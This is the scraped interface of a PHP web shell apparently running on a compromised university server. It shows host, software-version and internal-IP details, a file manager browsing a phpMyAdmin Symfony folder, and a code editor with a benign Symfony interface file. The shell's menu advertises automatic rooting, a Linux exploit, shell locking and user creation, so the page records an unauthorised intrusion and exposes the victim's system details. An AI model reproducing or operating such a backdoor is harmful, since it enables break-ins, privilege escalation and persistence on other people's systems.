Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
phpmyadmin /
vendor /
symfony /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
Builder
[ DIR ]
drwxr-xr-x
Definition
[ DIR ]
drwxr-xr-x
Exception
[ DIR ]
drwxr-xr-x
Loader
[ DIR ]
drwxr-xr-x
Resource
[ DIR ]
drwxr-xr-x
Util
[ DIR ]
drwxr-xr-x
CHANGELOG.md
4.14
KB
-rw-r--r--
composer.json
1.32
KB
-rw-r--r--
ConfigCacheFactoryInterface.php
958
B
-rw-r--r--
ConfigCacheFactory.php
1.08
KB
-rw-r--r--
ConfigCacheInterface.php
1.25
KB
-rw-r--r--
ConfigCache.php
1.5
KB
-rw-r--r--
FileLocatorInterface.php
1.03
KB
-rw-r--r--
FileLocator.php
2.48
KB
-rw-r--r--
LICENSE
1.04
KB
-rw-r--r--
README.md
596
B
-rw-r--r--
ResourceCheckerConfigCacheFactory.php
1.05
KB
-rw-r--r--
ResourceCheckerConfigCache.php
5.46
KB
-rw-r--r--
ResourceCheckerInterface.php
1.2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : FileLocatorInterface.php
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\Config; use Symfony\Component\Config\Exception\FileLocatorFileNotFoundException; /** * @author Fabien Potencier <fabien@symfony.com> */ interface FileLocatorInterface { /** * Returns a full path for a given file name. * * @param string $name The file name to locate * @param string|null $currentPath The current path * @param bool $first Whether to return the first occurrence or an array of filenames * * @return string|array The full path to the file or an array of file paths * * @throws \InvalidArgumentException If $name is empty * @throws FileLocatorFileNotFoundException If a file is not found */ public function locate(string $name, string $currentPath = null, bool $first = true); }
Close